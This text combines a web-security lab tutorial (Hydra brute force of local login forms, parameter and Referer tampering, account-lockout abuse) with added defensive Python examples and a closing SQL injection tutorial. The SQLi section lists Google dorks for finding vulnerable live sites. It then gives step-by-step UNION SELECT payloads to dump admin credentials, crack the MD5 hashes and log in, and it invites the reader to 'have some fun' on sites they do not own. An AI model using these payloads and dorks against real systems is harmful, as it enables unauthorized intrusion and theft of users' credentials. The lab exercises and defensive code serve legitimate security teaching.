Introduction
Websites are used daily by a large part of the world’s population to carry sensitive data from a person to an entity with online-based presence. In websites containing materials that are shown after authentication only, forms transfer data containing user credentials to server-side scripts. Users store their credit card details in their online accounts and use forms to buy items online, so it is crucial to keep the integrity, confidentiality and availability of this data intact.
This article is written merely with penetration testing and website security in mind. Any attempts to penetrate into live systems on your behalf and without consent may lead to criminal proceedings.
To try the training files that come along with this article, you will need a local server such as XAMPP or WAMP with Apache and preferably MySQL turned on. If you are on Windows, to install Hydra you will need the make, gcc and ssl libraries from Cygwin. Thereafter, you start it from the Cygwin Terminal. John the Ripper, on the other hand, can be started from the Command Prompt.
Exercise 1: Deep Data Hiding
In the past, and even today, some people have used security through obscurity. This means that they have unprotected directories and files with the sole protection being that they do not have any backlinks and no links to them in the main site. Thus, if one knew the URL of the directory or file – he could readily access it. A common way to reveal obscure directories is to check the publicly visible robots.txt and see what is disallowed to be indexed by search engines.
Now open the DeepDataHiding folder through your localhost and try to find the hidden directory where .doc files uploaded by “users” are stored, then access it. If you upload a .doc file from the directory's main page to test this out, it won’t leave your computer.
Exercise 2: Populating a Dictionary
To populate a dictionary, we will be using John the Ripper. Open the PopulatingDictionary folder.
You can populate a dictionary in John the Ripper and cut the output size by knowing the type of password (its maximum length, whether it should be only digits, contain special characters, etc.).
To create a simple dictionary and save it to a file, browse to the John the Ripper installation directory in CMD and use: john-mmx --incremental=alpha --stdout > filename, where filename is the name and location of the file in which the words should be saved.
There are various options in the incremental mode, such as Digit (only digits), Lanman (letters, numbers and some special characters), Alpha (only letters) and All (all characters). Thus, you can also use john-mmx --incremental=lanman --stdout > wordlist.txt, etc.
Be aware that the size of the text file would probably get really big in just a couple of seconds, depending on your machine’s abilities.
Exercise 3: Acquiring user and password list for dictionary attacks
Querying Google for passwords and user lists is usually pretty straightforward.
You use something like filetype:lst password for passwords and filetype:lst user for username lists.
We have included a sample username list and a password list downloaded from the Internet along with the attachment files to this article.
Exercise 4: Breaking HTTPAuth
For this exercise, we will be using Hydra and the user/pass lists included in the attachment files.
When calling Hydra ($ hydra.exe), the parameter -L usrlistpath supplies the program with the path to a username list file; each username in it will be tested against all the passwords until a match is found. -l username gives Hydra a single username, an option you can use if you know the username of the account you are trying to break into but not its password.
-P loads a password list, while -p loads a single password.
Next, you specify the host to attack (localhost or 127.0.0.1) followed by http-get (request a directory/page), followed by the path to the particular directory or file you are trying to access (path excluding the host which is already given). It will most likely look something like this:
hydra.exe -L HD:/WebsiteHacking/FormCracking/usrnames.txt -P HD:/WebsiteHacking/FormCracking/passwords.txt localhost http-get /HTTPSecurity/
Figure 1: the HTTPAuth seeking credentials. Get them!
To establish a simple HTTPAuth mechanism yourself, you create the user account (password) file with htpasswd.exe from your Apache bin folder, run from the Command Prompt. You can move the user account list file to any directory you want and start the mechanism by editing your .htaccess file:
You can select only particular users to be able to access the page, and you can set different username lists for different parts of the website, but this mechanism for protection remains basic. To test cracking the example from the files, change the path of AuthUserFile to the current location of the HTTPSecurity directory.
Exercise 5: Breaking a POST login form
The password and username lists are in the FormCracking folder. They have not been changed, but the correct login credentials are easy enough.
The following statement might work:
hydra -L path/FormCracking/usrnames.txt -P path/FormCracking/passwords.txt 127.0.0.1 http-post-form "/FormCracking/index.php:username=^USER^&passwd=^PASS^:Oops"
The difference between this statement and the one we used to crack the HTTPAuth mechanism is that here we include the parameters that the form sends to the server-side script, in this case username and passwd. Those are the “name” attributes of the relevant input tags that we want to test.
Figure 2: viewing the POST fields.
Another difference is that after the address we want to crack we include, separated by a colon ( : ), the text that appears when a login submission is incorrect. Basically, we are telling the program to repeat until it gets a different output. In our case, “Oops” is part of the login error string we receive.
We also put ^USER^ and ^PASS^ in place of the values of the POST fields that the program must fill with entries from the username and password lists.
Then, we wait and the job is done.
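Added example for the defender's side of Exercises 4 and 5 (not part of the article or its attachments): Python detection logic run over constructed application-side authentication log lines. It flags a single IP bursting through a username list the way Hydra does with -L and -P, and a username being tried from many addresses within the same window. The log format, thresholds and IP addresses are my assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of an application-side authentication log (not from the
# article). Each line records the outcome, client IP and username attempted.
# Dictionary guessing shows up as a burst of "fail" lines from one address.
SAMPLE_AUTH_LOG = """\
2015-03-01T10:00:00Z ip=10.0.0.5 user=alice result=ok
2015-03-01T10:00:01Z ip=10.0.0.9 user=admin result=fail
2015-03-01T10:00:01Z ip=10.0.0.9 user=admin result=fail
2015-03-01T10:00:02Z ip=10.0.0.9 user=admin result=fail
2015-03-01T10:00:02Z ip=10.0.0.9 user=admin result=fail
2015-03-01T10:00:03Z ip=10.0.0.9 user=admin result=fail
2015-03-01T10:00:03Z ip=10.0.0.9 user=admin result=ok
2015-03-01T10:00:10Z ip=10.0.0.7 user=bob result=fail
2015-03-01T10:05:00Z ip=10.0.0.7 user=bob result=ok
2015-03-01T10:07:00Z ip=10.0.1.1 user=john result=fail
2015-03-01T10:07:01Z ip=10.0.1.2 user=john result=fail
2015-03-01T10:07:02Z ip=10.0.1.3 user=john result=fail
2015-03-01T10:07:03Z ip=10.0.1.4 user=john result=fail
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_auth_log(text):
    """Yield (timestamp, ip, user, result) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["ip"], m["user"], m["result"]


def detect_bruteforce(text, max_failures=5, window_seconds=60, spray_ips=3):
    """Return (burst_ips, sprayed_users):
    - burst_ips: addresses with at least max_failures failed logins inside a
      sliding window of window_seconds (one client working through a list);
    - sprayed_users: usernames that failed from at least spray_ips distinct
      addresses inside the same window (the same guessing spread over IPs).
    """
    window = timedelta(seconds=window_seconds)
    recent_by_ip = defaultdict(deque)    # ip   -> timestamps of recent failures
    recent_by_user = defaultdict(deque)  # user -> (timestamp, ip) of recent failures
    burst_ips, sprayed_users = set(), set()

    for ts, ip, user, result in parse_auth_log(text):
        if result != "fail":
            continue
        q = recent_by_ip[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= max_failures:
            burst_ips.add(ip)

        uq = recent_by_user[user]
        uq.append((ts, ip))
        while uq and ts - uq[0][0] > window:
            uq.popleft()
        if len({src for _, src in uq}) >= spray_ips:
            sprayed_users.add(user)
    return sorted(burst_ips), sorted(sprayed_users)


if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_AUTH_LOG))
```

One caveat worth noticing: the web server's access log alone cannot feed this detector for the POST form, because a failed submission and a successful one both return HTTP 200 and differ only in the body text (“Oops”), which is exactly what Hydra keys on. HTTPAuth failures at least show up as 401 responses, but for forms the application itself must log the outcome of every login attempt.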
Exercise 6: Modifying Parameters
The next exercise is in the folder ParameterTampering. Open ParameterTampering/login.php with your browser. Your task is to bypass authorization, that is, to log in with wrong credentials without viewing the server-side code, reaching the members.php message and members2.php without the “Error!” response. You do not have to crack the user details. For one of the methods, you must see what logging in looks like: use john/123.
The first manner in which you can do this is by modifying an element in the page, the second involves a change in the URL.
The other task is to enter members2.php without the server echoing “Error”. To do this, you should tamper with the HTTP headers and add a Referer header. I would recommend a plugin such as Tamper Data for Firefox or Request Maker for Chrome.
Answers:
1st possibility:
Figure 3: modifying the values of hidden inputs.
It might seem weird at first, but many sites actually have hidden inputs in which they store important data. An example is PayPal shopping carts on third-party websites, where you can change fields such as the name of the product directly by changing the value of a hidden input. Some outdated shopping carts still pass the price as a hidden input, which means that unless you use the payment provider's API and verify the amount that was actually paid to you through a server-side script, the user can easily pay as much as he wants for the product!
Figure 4: an example of a shopping cart which sets the price of the item on the client-side.
Figure 5: changing the name of the product in stores using PayPal as a payment method can still do some harm.
2nd possibility:
Adding a loggedin parameter to the GET request in the URL; that is probably not something you would meet somewhere today, though.
3rd possibility, members2.php:
Install and start Tamper Data with alt+T when the page is opened. Add a new header called Referer with the path to login.php as its value; it will look as if you were redirected from login.php. There are developers out there who think HTTP_REFERER proves that the user is legitimate, despite it being just a header sent with the HTTP request, and this is a point of exploitation in some sites even today.
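The server-side check that Exercise 6 calls for, as an added example that is not from the article: Python code that prices a cart from the server's own catalog, treats a posted hidden-input price that disagrees with the catalog as tampering, and compares the amount a payment provider reports back against the server-computed total instead of against anything the client sent. The catalog, item ids and field names are constructed for the example.

```python
from decimal import Decimal, InvalidOperation

# Constructed sample catalog: the only prices the server believes. In a real
# shop this is a database table, never a hidden <input> in the page.
CATALOG = {
    "book-101": Decimal("19.99"),
    "mug-202": Decimal("7.50"),
}


class TamperedCart(ValueError):
    """Raised when client-supplied cart data cannot be trusted."""


def price_cart(client_items):
    """client_items: list of dicts as posted by the form, e.g.
    {"id": "book-101", "qty": "2", "price": "19.99"}.
    A posted price is compared with the catalog only to *detect* tampering;
    the total returned is always computed from the catalog."""
    total = Decimal("0")
    for item in client_items:
        item_id = item.get("id")
        if item_id not in CATALOG:
            raise TamperedCart(f"unknown item {item_id!r}")
        try:
            qty = int(item.get("qty", 1))
        except (TypeError, ValueError):
            raise TamperedCart("quantity is not an integer")
        if qty < 1 or qty > 100:
            raise TamperedCart(f"quantity {qty} out of range")
        posted = item.get("price")
        if posted is not None:
            try:
                posted_price = Decimal(str(posted))
            except InvalidOperation:
                raise TamperedCart("posted price is not a number")
            if posted_price != CATALOG[item_id]:
                raise TamperedCart(
                    f"posted price {posted} for {item_id} does not match catalog")
        total += CATALOG[item_id] * qty
    return total


def payment_covers_order(paid_amount, paid_currency, client_items, currency="USD"):
    """Compare what the payment provider confirms was paid (for PayPal, via its
    server-to-server notification) with what the server itself charged."""
    try:
        paid = Decimal(str(paid_amount))
    except InvalidOperation:
        return False
    return paid_currency == currency and paid == price_cart(client_items)


if __name__ == "__main__":
    honest = [{"id": "book-101", "qty": 2, "price": "19.99"}]
    print(price_cart(honest))                     # 39.98, from the catalog
    tampered = [{"id": "book-101", "qty": 1, "price": "0.01"}]
    try:
        price_cart(tampered)
    except TamperedCart as e:
        print("rejected:", e)
```

The point of keeping the posted price at all is detection: a mismatch is a strong signal that somebody edited the hidden input, so it is worth logging, while the amount actually charged never depends on it.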
Exercise 7: Exploiting Account Lockout
If you have a simple lockout mechanism like this (PHP/MySQL, AccountLockout1 folder):
If we have such a login form, or we rely on a WordPress or Joomla plugin that behaves this way without being aware of it, then malicious people can lock an account just by knowing the username. On many sites the username is readily available, for instance in comments to articles, message boards, social media likes, etc.
A solution is to block only the offending IP address, and to apply the block only for a limited duration.
A sample solution that adds a duration to the account lockout in PHP/MySQL could look something like this:
Adding a user to the database could look like:
We use the number -1 to indicate that there is no lockout.
Then we change a bit the old code:
This simple script will lock out the account after 3 attempts for different periods of time, until a full hour has passed since the lockout. It can be found in the AccLockoutDuration folder.
Better still, add an IP ban and implement a more robust version of the above script, which serves demonstration purposes only.
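Since the article's PHP/MySQL scripts are not reproduced on this page, here is an added example in Python with an in-memory sqlite3 table standing in for the MySQL table. It is not the article's code. It locks an account after 3 failed attempts for escalating periods capped at one hour, uses -1 for “no lockout” as the article does, and additionally blocks the offending IP address for a limited time so that an attacker who knows a username cannot keep the real user locked out indefinitely. Table and column names, the escalation steps and the per-IP threshold are my assumptions.

```python
import sqlite3
import time

# Assumed schema (not the article's). locked_until is a Unix timestamp;
# -1 means "no lockout", following the article's convention.
SCHEMA = """
CREATE TABLE accounts (
    username     TEXT PRIMARY KEY,
    failures     INTEGER NOT NULL DEFAULT 0,
    lockouts     INTEGER NOT NULL DEFAULT 0,
    locked_until REAL    NOT NULL DEFAULT -1
);
CREATE TABLE ip_failures (
    ip           TEXT PRIMARY KEY,
    failures     INTEGER NOT NULL DEFAULT 0,
    locked_until REAL    NOT NULL DEFAULT -1
);
"""

MAX_ATTEMPTS = 3                       # the article's threshold
ACCOUNT_STEPS = (60, 300, 900, 3600)   # escalating account lock, capped at one hour
IP_MAX_ATTEMPTS = 10                   # assumed: failures from one address before it is blocked
IP_LOCK_SECONDS = 900                  # assumed: length of the IP block


def open_store():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def add_user(db, username):
    db.execute("INSERT INTO accounts (username) VALUES (?)", (username,))


def _record_ip_failure(db, ip, now):
    """Count a failure against the client address and block it when it
    exceeds IP_MAX_ATTEMPTS. This runs for unknown usernames too."""
    db.execute("INSERT OR IGNORE INTO ip_failures (ip) VALUES (?)", (ip,))
    db.execute("UPDATE ip_failures SET failures = failures + 1 WHERE ip = ?", (ip,))
    n = db.execute("SELECT failures FROM ip_failures WHERE ip = ?", (ip,)).fetchone()[0]
    if n >= IP_MAX_ATTEMPTS:
        db.execute("UPDATE ip_failures SET failures = 0, locked_until = ? WHERE ip = ?",
                   (now + IP_LOCK_SECONDS, ip))


def check_login(db, username, ip, password_ok, now=None):
    """Return 'ok', 'bad_password', 'ip_locked' or 'account_locked'.
    password_ok is the outcome of the real credential check (a hash
    comparison in a real application); this function only handles lockout.
    Unknown usernames get the same 'bad_password' answer as wrong passwords."""
    now = time.time() if now is None else now
    ipr = db.execute("SELECT locked_until FROM ip_failures WHERE ip = ?", (ip,)).fetchone()
    if ipr and ipr[0] != -1 and ipr[0] > now:
        return "ip_locked"
    acc = db.execute("SELECT failures, lockouts, locked_until FROM accounts WHERE username = ?",
                     (username,)).fetchone()
    if acc is None:
        _record_ip_failure(db, ip, now)
        return "bad_password"
    failures, lockouts, locked_until = acc
    if locked_until != -1 and locked_until > now:
        return "account_locked"
    if password_ok:
        db.execute("UPDATE accounts SET failures = 0, locked_until = -1 WHERE username = ?",
                   (username,))
        return "ok"
    _record_ip_failure(db, ip, now)
    failures += 1
    if failures >= MAX_ATTEMPTS:
        # each successive lockout lasts longer, up to the one-hour cap
        duration = ACCOUNT_STEPS[min(lockouts, len(ACCOUNT_STEPS) - 1)]
        db.execute("UPDATE accounts SET failures = 0, lockouts = ?, locked_until = ? "
                   "WHERE username = ?", (lockouts + 1, now + duration, username))
    else:
        db.execute("UPDATE accounts SET failures = ? WHERE username = ?", (failures, username))
    return "bad_password"


if __name__ == "__main__":
    db = open_store()
    add_user(db, "john")
    for _ in range(3):
        print(check_login(db, "john", "10.0.0.9", False, now=1000.0))  # bad_password x3
    print(check_login(db, "john", "10.0.0.9", True, now=1001.0))       # account_locked
    print(check_login(db, "john", "10.0.0.9", True, now=1100.0))       # ok
```

Because the account lock is short and capped while the IP block is what actually stops a guessing client, a stranger who only knows a username can annoy its owner for a minute, not an hour, and loses the ability to try again well before that. A production version would also let the lockouts counter decay after a quiet period and would count failures behind a proxy by the real client address.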
Exercise 8: yet to come…
Conclusion
We have barely covered the topic of website hacking and web security, as this is a vast field to touch upon. I hope future articles will reveal more and more of this field, as the leakage of data can harm not only the reputation of your business, the trust of your clients and the well-being of those clients, but can also put you in front of serious legal proceedings.
SQL Injection
If you are new to the world of hacking websites, then SQL injection is possibly the easiest to learn and most common of the substantial website vulnerabilities that can be exploited.
NOTE: The following tutorial contains only basic SQL injection, if you are already familiar with this, then this tutorial will probably not help you.
Hacking a vulnerable website with SQL injection (more commonly known as SQLi) allows you to obtain usernames and passwords, possibly even access the admin account, and from there you could do whatever you wanted to the website. When Anonymous//LulzSec hacked the Sony PlayStation Network and obtained personal information of hundreds of thousands of users, they used an advanced form of this hack. This hack can be performed from any computer or device with an internet connection and a browser.
Step 1: Find a vulnerable website. One way you can do this is by using what is called a Google
This is a list of dorks you can use to help you find an SQL vulnerable website, using Google Search! Simply go to Google and enter (without quotes) allinurl:dorkhere
trainers.php?id=
article.php?id=
play_old.php?id=
staff.php?id=
games.php?id=
newsDetail.php?id=
product.php?id=
product-item.php?id=
news_view.php?id=
humor.php?id=
humour.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
detail.php?id=
publications.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
shop.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
ages.php?id=
review.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
profile_view.php?id=
view_faq.php?id=
fellows.php?id=
club.php?id=
clubpage.php?id=
curriculum.php?id=
top10.php?id=
person.php?id=
game.php?id=
art.php?id=
read.php?id=
newsone.php?id=
title.php?id=
home.php?id=
NOTE: The above list of dorks is only a very short list, a more comprehensive list can be found on the internet.
Step 2: When you have found a vulnerable URL that you like, such as
www.site.com/news.php?id=2
add a single quote mark to the end of the URL, so that it looks like this:
www.site.com/news.php?id=2'
Step 3: The site will be vulnerable to this attack if you get an error, or some of the content (pictures / text are common) from the page is missing.
Step 4: Now that we have confirmed that the site is vulnerable, we will try what is called an order by syntax.
At the end of your URL, remove your quote mark, and add the following: +order+by+50--
If you get an error, this is good. If you do not get an error, you should try to find a different site, there are ways to get around this, but they will not be covered in this tutorial.
The idea is to find the highest possible number you can order by without getting an error or missing content. This is the number of tables that the site contains.
For example, if you get an error at 9, but not at 8, it means that the number you will be using is 8. Write this number down. Remember, it is the number without an error, not with.
An example URL is below:
www.site.com/news.php?id=2 order by 8--
Step 5: Now that we have the number of tables, we will perform what is called a union select syntax.
Remove your order by syntax, making sure to have written down / remembered the number of tables (the highest number without an error or missing content).
Add a negative symbol (a dash) before the ID number.
Now add the following to your URL: union select 1, 2, 3, 4, 5, 6, 7, 8--
This syntax will select the number of tables that you wish to use.
You should count up until the number of tables that the page has.
An example URL is below:
www.site.com/news.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7, 8--
If you see a couple of numbers on the page, you have done it correctly! Good work! If you see an error resembling 'The union select statement does not match the number of tables on the page', then the site resisted the order by syntax. In this case, you should try to find another site, there are again ways to get around this, but this is a basic tutorial.
Step 6: When you see the numbers on the page (they should be numbers between 1 and the number of tables on the site) (there should be 2-6 numbers), choose one of them.
Now, replace the number you chose in your union select syntax with @@version. Let's say I choose 2.
An example URL is below:
www.site.com/news.php?id=-2 union select 1, @@version, 3, 4, 5, 6, 7, 8--
Now the number you chose should be replaced by a string of numbers. This is usually a 4.xx.xxx or a 5.xx.xxx. This is the MySQL version the target is running. This is important for later.
Step 7: Now we will find the names of the different tables in the site. This is called a group concat syntax.
Replace your @@version with group_concat(table_name) and add from information_schema.tables where table_schema=database()--
An example URL is below:
www.site.com/news.php?id=-2 union select 1, group_concat(table_name), 3, 4, 5, 6, 7, 8 from information_schema.tables where table_schema=database()--
Now in place of the MySQL version you should see a string of words; they could contain anything. These are the website's tables. You want to look for one that sounds like the admin or user table.
Common tables are:
admin, user, users, members, admintbl, usertbl
Let's say I found the table 'admin' (without quotes)
Now, take the exact name of the table, no additional spaces or linebreaks, and go to http://home2.paulsch...et/tools/xlate/.
Enter your table name into the TEXT field, and click encode.
Now from the ASCII DEC / CHAR field, take those numbers and replace the spaces with commas, so that it looks like this (for admin; the numbers will be different depending on the table!)
97,100,109,105,110
Step 8: Now we will find the different columns (such as the username, password, email, accesslevel) of the table we selected.
Change your current group concat syntax to the following.
Replace group_concat(table_name) with group_concat(column_name), and replace from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=CHAR(YOUR ASCII HERE)--
An example URL is below:
www.site.com/news.php?id=-2 union select 1, group_concat(column_name), 3, 4, 5, 6, 7, 8 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--
Note that the ASCII numbers you input will be different depending on your table name.
Now the table names will be replaced with the columns.
Common columns include:
userid, user, username, password, email, accesslevel, firstname, lastname
Step 9: What you're looking for is the ones that will give you the information to compromise the site. From the above common columns, the most useful would be username/userid/user (or whatever the user column is called) and password (for obvious reasons). But also we want the accesslevel column, so that we don't have to log in multiple times to find the admin.
Usually the admin's accesslevel will be the highest number, higher than the others. Alternatively, the admin user's username may be 'admin' or 'superuser' etc.
Now, we need to again change our group_concat syntax.
Let's say I want the columns userid, password, accesslevel.
Replace your group_concat(column_name) with group_concat(userid,0x3a,password,0x3a,accesslevel). You can add more columns if you want; just make sure there is ,0x3a, between each one.
Replace your from information_schema.columns where table_name=CHAR(YOUR ASCII)-- with from TABLE NAME--
Where TABLE NAME is the table that these columns are from.
An example URL is below:
www.site.com/news.php?id=-2 union select 1, group_concat(userid,0x3a,password,0x3a,accesslevel), 3, 4, 5, 6, 7, 8 from admin--
Now your list of columns should be replaced with something like the following:
james:shakespeare:0,ryan:mozart:1,admin:bach:2,superadmin:debussy:3
Or something similar. Remember your current group concat syntax. It will display the data like this, for userid,0x3a,password,0x3a,accesslevel:
USERNAME1:PASSWORD1:ACCESSLEVEL1,USERNAME2:PASSWORD2:ACCESSLEVEL2,USERNAME3:PASSWORD3:ACCESSLEVEL3
where USERNAME, PASSWORD and ACCESSLEVEL with the same number all correspond to the same user.
The 0x3a in your group concat translates to a colon ( : ). A comma separates each individual user.
Often, the password will appear to be a random string of numbers and letters, such as 5f4dcc3b5aa765d61d8327deb882cf99. This is called an MD5 hash. It is a hashed, not encrypted, password.
Step 10: Now we will need to recover the password from this hash to log in. You can either do this online or with software. Software is far more effective, as you can set it to an unlimited time limit and use different methods, but if you don't want to use software due to malware paranoia, that is OK, although sometimes you will not find the password.
If you want to use software, go here: http://www.oxid.it/cain.html and download Cain and Abel. I will not go into how to set this up to crack an MD5, but a simple google search will suffice. 'Cracking MD5 with Cain and Abel' or something similar.
If you want to use a website, go here (I find this to be the best): http://www.md5decrypter.co.uk
Step 11: Log in to your newly obtained account (whether it's admin or not) and have some fun!
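As an added example (not the tutorial's code), here is the lookup behind a news.php?id= page written both ways against an in-memory sqlite3 database, together with the password storage that makes a dumped password column useless for Step 10. The vulnerable function pastes the query string value into SQL, so the quote of Step 2 produces an error and the UNION SELECT of Step 5 returns rows from the admin table; the hardened function validates the id as an integer and binds it as a parameter. The news and admin tables and their columns follow the tutorial's narrative but are constructed here; sqlite3 stands in for MySQL.

```python
import hashlib
import hmac
import os
import re
import sqlite3


def hash_password(password, salt=None, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256: what a password column should hold
    instead of the bare MD5 the tutorial expects to find in a dump. A fresh
    random salt per user defeats precomputed lookup tables."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except (AttributeError, ValueError):
        return False
    if algo != "pbkdf2_sha256":
        return False
    recomputed = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(recomputed.hex(), digest_hex)


def looks_like_unsalted_md5(stored):
    """Audit helper: a 32-hex-digit password field is almost certainly raw MD5."""
    return re.fullmatch(r"[0-9a-fA-F]{32}", stored or "") is not None


def build_db():
    """Constructed sample database matching the tutorial's table names."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (userid TEXT, password TEXT, accesslevel INTEGER);
        INSERT INTO news VALUES (2, 'Welcome', 'First post');
    """)
    db.execute("INSERT INTO admin VALUES (?, ?, ?)", ("admin", hash_password("bach"), 2))
    return db


def vulnerable_news(db, id_param):
    """The pattern the tutorial exploits: the raw query-string value becomes part
    of the SQL text, so a stray quote breaks the statement and a crafted value
    appends its own UNION SELECT."""
    sql = "SELECT title, body FROM news WHERE id=" + id_param   # never do this
    return db.execute(sql).fetchall()


def safe_news(db, id_param):
    """Hardened form: reject anything that is not an integer id, then bind the
    value as a parameter. The UNION payload fails validation before it reaches
    the database, and even a bound string could not change the query's shape."""
    try:
        news_id = int(id_param)
    except (TypeError, ValueError):
        return []
    return db.execute("SELECT title, body FROM news WHERE id=?", (news_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "-2 union select userid, password from admin--"
    print("vulnerable:", vulnerable_news(db, payload))  # leaks the admin row
    print("safe:", safe_news(db, payload))              # []
```

Two things the example shows that the steps alone do not: the leaked column is still a hash, but the one the tutorial quotes, 5f4dcc3b5aa765d61d8327deb882cf99, is the MD5 of the word “password”, which is why an online lookup finds it instantly, whereas a salted PBKDF2 value has to be attacked per user and per guess; and the fix is not to filter out keywords such as union but to stop treating user input as SQL text at all.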
Disclaimer: This tutorial is meant for educational purposes only. Misuse of the techniques above may be in conflict with the laws in your state, province or country. I may not be held responsible for any harm that may come from this tutorial.
Writer: Deepak Kumar (COO & President at Alex Automation)